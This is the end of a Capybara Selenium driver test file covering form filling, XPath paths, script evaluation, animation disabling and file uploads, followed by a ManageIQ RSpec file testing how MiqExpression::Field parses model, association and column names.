expect(session.find(:fillable_field, 'form_first_name').value).to eq('JohnABHarry')
end
end
describe '#fill_in with Emoji' do
it 'sends emojis' do
session.visit('/form')
        session.fill_in('form_first_name', with: 'a😀cd😴 🛌🏽🇵🇹 e🤾🏽‍♀️f')
        expect(session.find(:fillable_field, 'form_first_name').value).to eq('a😀cd😴 🛌🏽🇵🇹 e🤾🏽‍♀️f')
end
end
describe '#path' do
it 'returns xpath' do
# this is here because it is testing for an XPath that is specific to the algorithm used in the selenium driver
session.visit('/path')
element = session.find(:link, 'Second Link')
expect(element.path).to eq('/HTML/BODY[1]/DIV[2]/A[1]')
end
it 'handles namespaces in xhtml' do
pending "IE 11 doesn't handle all XPath querys (namespace-uri, etc)" if ie?(session)
session.visit '/with_namespace'
rect = session.find(:css, 'div svg rect:first-of-type')
expect(rect.path).to eq("/HTML/BODY[1]/DIV[1]/*[local-name()='svg' and namespace-uri()='http://www.w3.org/2000/svg'][1]/*[local-name()='rect' and namespace-uri()='http://www.w3.org/2000/svg'][1]")
expect(session.find(:xpath, rect.path)).to eq rect
end
it 'handles default namespaces in html5' do
pending "IE 11 doesn't handle all XPath querys (namespace-uri, etc)" if ie?(session)
session.visit '/with_html5_svg'
rect = session.find(:css, 'div svg rect:first-of-type')
expect(rect.path).to eq("/HTML/BODY[1]/DIV[1]/*[local-name()='svg' and namespace-uri()='http://www.w3.org/2000/svg'][1]/*[local-name()='rect' and namespace-uri()='http://www.w3.org/2000/svg'][1]")
expect(session.find(:xpath, rect.path)).to eq rect
end
it 'handles case sensitive element names' do
pending "IE 11 doesn't handle all XPath querys (namespace-uri, etc)" if ie?(session)
session.visit '/with_namespace'
els = session.all(:css, 'div *', visible: :all)
expect { els.map(&:path) }.not_to raise_error
lg = session.find(:css, 'div linearGradient', visible: :all)
expect(session.find(:xpath, lg.path, visible: :all)).to eq lg
end
end
describe 'all with disappearing elements' do
it 'ignores stale elements in results' do
session.visit('/path')
elements = session.all(:link) { |_node| raise Selenium::WebDriver::Error::StaleElementReferenceError }
expect(elements.size).to eq 0
end
end
describe '#evaluate_script' do
it 'can return an element' do
session.visit('/form')
element = session.evaluate_script("document.getElementById('form_title')")
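      # the returned DOM node comes back wrapped as a Capybara::Node::Element, equal to the node found via the finders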
expect(element).to eq session.find(:id, 'form_title')
end
it 'can return arrays of nested elements' do
session.visit('/form')
elements = session.evaluate_script('document.querySelectorAll("#form_city option")')
expect(elements).to all(be_instance_of Capybara::Node::Element)
expect(elements).to eq session.find(:css, '#form_city').all(:css, 'option').to_a
end
it 'can return hashes with elements' do
session.visit('/form')
result = session.evaluate_script("{ a: document.getElementById('form_title'), b: {c: document.querySelectorAll('#form_city option')}}")
expect(result).to eq(
'a' => session.find(:id, 'form_title'),
'b' => {
'c' => session.find(:css, '#form_city').all(:css, 'option').to_a
}
)
end
describe '#evaluate_async_script' do
it 'will timeout if the script takes too long' do
skip 'safaridriver returns the wrong error type' if safari?(session)
session.visit('/with_js')
expect do
session.using_wait_time(1) do
session.evaluate_async_script('var cb = arguments[0]; setTimeout(function(){ cb(null) }, 3000)')
end
end.to raise_error Selenium::WebDriver::Error::ScriptTimeoutError
end
end
end
describe 'Element#inspect' do
it 'outputs obsolete elements' do
session.visit('/form')
el = session.find(:button, 'Click me!').click
expect(session).to have_no_button('Click me!')
allow(el).to receive(:synchronize)
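      # inspecting an obsolete element should report it as such without re-synchronizing/waiting on the node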
expect(el.inspect).to eq 'Obsolete #<Capybara::Node::Element>'
expect(el).not_to have_received(:synchronize)
end
end
describe 'Element#click' do
it 'should handle fixed headers/footers' do
session.visit('/with_fixed_header_footer')
session.using_wait_time(2) do
session.find(:link, 'Go to root').click
end
expect(session).to have_current_path('/')
end
end
describe 'Capybara#Node#attach_file' do
it 'can attach a directory' do
pending "Geckodriver doesn't support uploading a directory" if firefox?(session)
pending "Selenium remote doesn't support transferring a directory" if remote?(session)
pending "Headless Chrome doesn't support directory upload - https://bugs.chromium.org/p/chromedriver/issues/detail?id=2521&q=directory%20upload&colspec=ID%20Status%20Pri%20Owner%20Summary" if chrome?(session) && ENV['HEADLESS']
pending "IE doesn't support uploading a directory" if ie?(session)
pending 'Chrome/chromedriver 73 breaks this' if chrome?(session) && chrome_gte?(73, session) && chrome_lt?(75, session)
pending "Safari doesn't support uploading a directory" if safari?(session)
# pending "Edge/msedgedriver doesn't support directory upload" if edge?(session) && edge_gte?(75, session)
session.visit('/form')
test_file_dir = File.expand_path('./fixtures', File.dirname(__FILE__))
session.attach_file('Directory Upload', test_file_dir)
session.click_button('Upload Multiple')
expect(session.body).to include('5 | ') # number of files
end
it 'can attach a relative file' do
      pending 'Geckodriver on Windows requires an alternate file separator, which path expansion replaces' if Gem.win_platform? && firefox?(session)
session.visit('/form')
session.attach_file('Single Document', 'spec/fixtures/capybara.csv')
session.click_button('Upload Single')
expect(session.body).to include('Content-type: text/csv')
end
end
context 'Windows' do
it "can't close the primary window" do
expect do
session.current_window.close
end.to raise_error(ArgumentError, 'Not allowed to close the primary window')
end
end
# rubocop:disable RSpec/InstanceVariable
describe 'Capybara#disable_animation' do
context 'when set to `true`' do
before(:context) do # rubocop:disable RSpec/BeforeAfterAll
skip "Safari doesn't support multiple sessions" if safari?(session)
        # NOTE: Although Capybara::SpecHelper.reset! sets Capybara.disable_animation to false,
# it doesn't affect any of these tests because the settings are applied per-session
Capybara.disable_animation = true
@animation_session = Capybara::Session.new(session.mode, TestApp.new)
end
it 'should disable CSS transitions' do
@animation_session.visit('with_animation')
@animation_session.click_link('transition me away')
expect(@animation_session).to have_no_link('transition me away', wait: 0.5)
end
it 'should disable CSS animations (set to 0s)' do
@animation_session.visit('with_animation')
sleep 1
@animation_session.click_link('animate me away')
expect(@animation_session).to have_no_link('animate me away', wait: 0.5)
end
it 'should disable CSS animations on pseudo elements (set to 0s)' do
@animation_session.visit('with_animation')
sleep 1
@animation_session.find_link('animate me away').right_click
expect(@animation_session).to have_content('Animation Ended', wait: 0.1)
end
end
context 'if we pass in css that matches elements' do
before(:context) do # rubocop:disable RSpec/BeforeAfterAll
skip "safaridriver doesn't support multiple sessions" if safari?(session)
        # NOTE: Although Capybara::SpecHelper.reset! sets Capybara.disable_animation to false,
# it doesn't affect any of these tests because the settings are applied per-session
Capybara.disable_animation = '#with_animation a'
@animation_session_with_matching_css = Capybara::Session.new(session.mode, TestApp.new)
end
it 'should disable CSS transitions' do
@animation_session_with_matching_css.visit('with_animation')
sleep 1
@animation_session_with_matching_css.click_link('transition me away')
expect(@animation_session_with_matching_css).to have_no_link('transition me away', wait: 0.5)
end
it 'should disable CSS animations' do
@animation_session_with_matching_css.visit('with_animation')
sleep 1
@animation_session_with_matching_css.click_link('animate me away')
expect(@animation_session_with_matching_css).to have_no_link('animate me away', wait: 0.5)
end
end
context 'if we pass in css that does not match elements' do
before(:context) do # rubocop:disable RSpec/BeforeAfterAll
skip "Safari doesn't support multiple sessions" if safari?(session)
        # NOTE: Although Capybara::SpecHelper.reset! sets Capybara.disable_animation to false,
# it doesn't affect any of these tests because the settings are applied per-session
Capybara.disable_animation = '.this-class-matches-nothing'
@animation_session_without_matching_css = Capybara::Session.new(session.mode, TestApp.new)
end
it 'should not disable CSS transitions' do
@animation_session_without_matching_css.visit('with_animation')
sleep 1
@animation_session_without_matching_css.click_link('transition me away')
sleep 0.5 # Wait long enough for click to have been processed
expect(@animation_session_without_matching_css).to have_link('transition me away', wait: false)
expect(@animation_session_without_matching_css).to have_no_link('transition me away', wait: 5)
end
it 'should not disable CSS animations' do
@animation_session_without_matching_css.visit('with_animation')
sleep 1
@animation_session_without_matching_css.click_link('animate me away')
sleep 0.5 # Wait long enough for click to have been processed
expect(@animation_session_without_matching_css).to have_link('animate me away', wait: false)
expect(@animation_session_without_matching_css).to have_no_link('animate me away', wait: 5)
end
end
end
# rubocop:enable RSpec/InstanceVariable
describe ':element selector' do
it 'can find html5 svg elements' do
session.visit('with_html5_svg')
expect(session).to have_selector(:element, :svg)
expect(session).to have_selector(:element, :rect, visible: :visible)
expect(session).to have_selector(:element, :circle)
expect(session).to have_selector(:element, :linearGradient, visible: :all)
end
it 'can query attributes with strange characters' do
session.visit('/form')
expect(session).to have_selector(:element, "{custom}": true)
expect(session).to have_selector(:element, "{custom}": 'abcdef')
end
end
describe 'with react' do
context 'controlled components' do
it 'can set and clear a text field' do
skip "This test doesn't support older browsers" if ie?(session)
session.visit 'react'
session.fill_in('Name:', with: 'abc')
session.accept_prompt 'A name was submitted: abc' do
session.click_button('Submit')
end
session.fill_in('Name:', with: '')
session.accept_prompt(/A name was submitted: $/) do
session.click_button('Submit')
end
end
it 'works with rapid fill' do
skip "This test doesn't support older browsers" if ie?(session)
session.visit 'react'
long_string = (0...60).map { |i| ((i % 26) + 65).chr }.join
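        # 60 characters cycling A-Z - long enough to exercise the rapid-fill path against the controlled input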
session.fill_in('Name:', with: long_string)
session.accept_prompt "A name was submitted: #{long_string}" do
session.click_button('Submit')
end
end
end
end
end
def headless_or_remote?
!ENV['HEADLESS'].nil? || session.driver.options[:browser] == :remote
end
end
| 43.062 | 235 | 0.642794 |
e9e191851e89d0fd9b34c1f859dda796aa3a57f7 | 5,444 | require "rails_helper"
RSpec.describe MiqExpression::Field do
describe ".parse" do
it "can parse the model name" do
field = "Vm-name"
expect(described_class.parse(field).model).to be(Vm)
end
it "can parse a namespaced model name" do
field = "ManageIQ::Providers::CloudManager::Vm-name"
expect(described_class.parse(field).model).to be(ManageIQ::Providers::CloudManager::Vm)
end
it "can parse the model name with associations present" do
field = "Vm.host-name"
expect(described_class.parse(field).model).to be(Vm)
end
it "can parse the column name" do
field = "Vm-name"
expect(described_class.parse(field).column).to eq("name")
end
it "can parse the column name with associations present" do
field = "Vm.host-name"
expect(described_class.parse(field).column).to eq("name")
end
it "can parse the column name with pivot table suffix" do
field = "Vm-name__pv"
expect(described_class.parse(field).column).to eq("name")
end
it "can parse column names with snakecase" do
field = "Vm-last_scan_on"
expect(described_class.parse(field).column).to eq("last_scan_on")
end
it "can parse the associations when there is none present" do
field = "Vm-name"
expect(described_class.parse(field).associations).to be_empty
end
it "can parse the associations when there is one present" do
field = "Vm.host-name"
expect(described_class.parse(field).associations).to eq(["host"])
end
it "can parse the associations when there are many present" do
field = "Vm.host.hardware-id"
expect(described_class.parse(field).associations).to eq(%w(host hardware))
end
it "will raise a parse error when given a field with unsupported syntax" do
field = "Vm,host+name"
expect { described_class.parse(field) }.to raise_error(MiqExpression::Field::ParseError)
end
end
describe "#reflections" do
it "returns an empty array if there are no associations" do
field = described_class.new(Vm, [], "name")
expect(field.reflections).to be_empty
end
it "returns the reflections of fields with one association" do
field = described_class.new(Vm, ["host"], "name")
expect(field.reflections).to match([an_object_having_attributes(:klass => Host)])
end
it "returns the reflections of fields with multiple associations" do
field = described_class.new(Vm, %w(host hardware), "guest_os")
expect(field.reflections).to match([an_object_having_attributes(:klass => Host),
an_object_having_attributes(:klass => Hardware)])
end
it "can handle associations which override the class name" do
field = described_class.new(Vm, ["users"], "name")
expect(field.reflections).to match([an_object_having_attributes(:klass => Account)])
end
it "can handle virtual associations" do
field = described_class.new(Vm, ["processes"], "name")
expect(field.reflections).to match([an_object_having_attributes(:klass => OsProcess)])
end
it "raises an error if the field has invalid associations" do
field = described_class.new(Vm, %w(foo bar), "name")
expect { field.reflections }.to raise_error(/One or more associations are invalid: foo, bar/)
end
end
describe "#date?" do
it "returns true for fields of column type :date" do
field = described_class.new(Vm, [], "retires_on")
expect(field).to be_date
end
it "returns false for fields of column type other than :date" do
field = described_class.new(Vm, [], "name")
expect(field).not_to be_date
end
end
describe "#datetime?" do
it "returns true for fields of column type :datetime" do
field = described_class.new(Vm, [], "created_on")
expect(field).to be_datetime
end
it "returns false for fields of column type other than :datetime" do
field = described_class.new(Vm, [], "name")
expect(field).not_to be_datetime
end
it "returns true for a :datetime type column on an association" do
field = described_class.new(Vm, ["guest_applications"], "install_time")
expect(field).to be_datetime
end
end
describe "#target" do
it "returns the model when there are no associations" do
field = described_class.new(Vm, [], "name")
expect(field.target).to eq(Vm)
end
it "returns the model of the target association if there are associations" do
field = described_class.new(Vm, ["guest_applications"], "name")
expect(field.target).to eq(GuestApplication)
end
end
describe "#plural?" do
it "returns false if the column is on a 'belongs_to' association" do
field = described_class.new(Vm, ["storage"], "region_description")
expect(field).not_to be_plural
end
it "returns false if the column is on a 'has_one' association" do
field = described_class.new(Vm, ["hardware"], "guest_os")
expect(field).not_to be_plural
end
it "returns true if the column is on a 'has_many' association" do
field = described_class.new(Host, ["vms"], "name")
expect(field).to be_plural
end
it "returns true if the column is on a 'has_and_belongs_to_many' association" do
field = described_class.new(Vm, ["storages"], "name")
expect(field).to be_plural
end
end
end
| 34.675159 | 99 | 0.673218 |